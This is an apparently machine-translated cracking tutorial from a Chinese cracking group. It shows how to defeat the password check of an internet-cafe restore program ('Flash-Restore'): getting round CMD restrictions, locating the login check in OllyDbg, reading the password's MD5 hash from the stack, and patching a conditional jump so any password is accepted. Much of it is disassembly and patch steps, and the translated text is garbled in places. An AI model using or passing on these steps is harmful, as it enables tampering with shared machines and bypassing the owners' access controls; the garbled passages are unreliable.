Flash-Restore Say Bye

Author: NetKi1l [ESST] China cracking alliance [edevil-Soul Security Team] (http://www.cncracker.com)
Tools used in this article:
OD Ring3 dynamic debugging tool (32-bit)

Wait) after the assumer.exe process is completed, you can create a new one! When creating a new website, enter cmd.exe and save it as cmd. bat can break through the restrictions on the use of CMD. If you still have restrictions on the use of CMD, you can search for relevant information from Baidu. I will not go into details here. Otherwise, after you start CMD and input WMIC, enter Process to see that the program is 1 under drive C.

Some people will ask you how to know which is the name of the flash process. We can open the task manager to view
2

Right-click the flash icon and go to the process.
Open the Directory and you can check the shell by yourself. I won't check the shell here. Now we run the program to see how the interface works. The program is in the lower right corner of the desktop, right-click the icon 3

Click "Restore Settings". 4 is displayed.

We entered the false code Netki1l to bring up the error message.
Now 5 after loading with OD

The code is neat. We should run the Code directly without any strong shell.
After running the program, let's try to see if we can find the key character escape prompts, for example
Sorry, prompts such as incorrect password and correct password. If the code can be found, it should be far from cracking. we reload the program and press ALT + F2 to close the current process and press CTRL + F2 to reload it. after the last debugging process is loaded, right-click the Disassembly window in the upper left corner and click the supercharacter reference. Then, the ASCII and UNICODE options will pop up. Generally, the ASCII results will pop up. escape, these are all network connection addresses (I won't copy them out because of too many characters). Does it look like there are no key words to be found? Will it be shelled? No matter what, we F9 let the program run first (my current Internet cafe is the Pubwin charging system. This system has something that will monitor all processes, so when OD runs, there will be a pop-up prompt, if it is also PUBWIN, it does not have any impact on the debugging program) after running, we press ALT + E or the E icon on the menu bar (this is to display the current module) after opening the program, we can select the process EXE of the program. Double-click 6

After double-clicking the program, I came to the Disassembly window and again looked for the ASCII character seek (after the program ran, the module checked the word seek to deal with the general shelling program very effective, you can try it yourself) this time we found a lot of useful buzzwords.

004F7E3A mov ecx, RecoverS.004F7EAC prompt
004F7F2D mov edx, RecoverS.004F8110 Change Password
004F7FA8 mov ecx, RecoverS.004F811C Error
004F7FAD mov edx and RecoverS.004F8124 fail to be modified because the passwords are inconsistent!
004F8016 mov ecx, RecoverS.004F811C Error
004F801B mov edx, RecoverS.004F8144 original Password error, modification failed!
004F8094 mov ecx, RecoverS.004F815C prompt
004F8099 mov edx, RecoverS.004F8164 password modified!
004F80AE mov ecx, RecoverS.004F811C Error
Failed to Change Password for 004F80B3 mov edx and RecoverS.004F8174!
004F91E6 mov ecx, RecoverS.004F924C Error
004F91EB mov edx, RecoverS.004F9254 incorrect password, login failed!
004F9281 mov ecx, RecoverS.004F9298 prompt
004F9286 mov edx, RecoverS.004F92A0 operation successful!

Double-click the address 004F91EB.

004F91E2 |./75 1D jnz short RecoverS.004F9201; the key to the full text jump here after double-clicking
004F91E4 |. | 6A 10 PUSH 10
004F91E6 |. | B9 4C924F00 mov ecx, RecoverS.004F924C; Error
004F91EB |. | BA 54924F00 mov edx, RecoverS.004F9254; incorrect password. logon failed!
004F91F0 |. | A1 24445000 mov eax, dword ptr ds: [504424]
004F91F5 |. | 8B00 mov eax, dword ptr ds: [EAX]
004F91F7 |. | E8 887BF7FF CALL RecoverS.00470D84
004F91FC |. | E8 67BCF0FF CALL RecoverS.00404E68
004F9201 |> EB 0E jmp short RecoverS.004F9211

When the F2 breakpoint at the Disassembly window address 004F91E2 is completed, we enter the false code Netki1l to interrupt the program.
We can see in the stack that the password is also MD5 32-bit encrypted

0155FC28 03B6DFC8 ASCII "d5ee4d63f409239f5018d683b332178a"
0155FC2C 03B7E128 ASCII "Netki1l"

Disconnected. Let's change the hexadecimal 75 1D to 74 to run the command. Then we can see that the result is 7.

I did not restart the test. You can test it yourself.

It can be seen that there are still many security risks in the Internet cafe, and the Administrator of the Internet cafe is expected to maintain and update the security in a timely manner.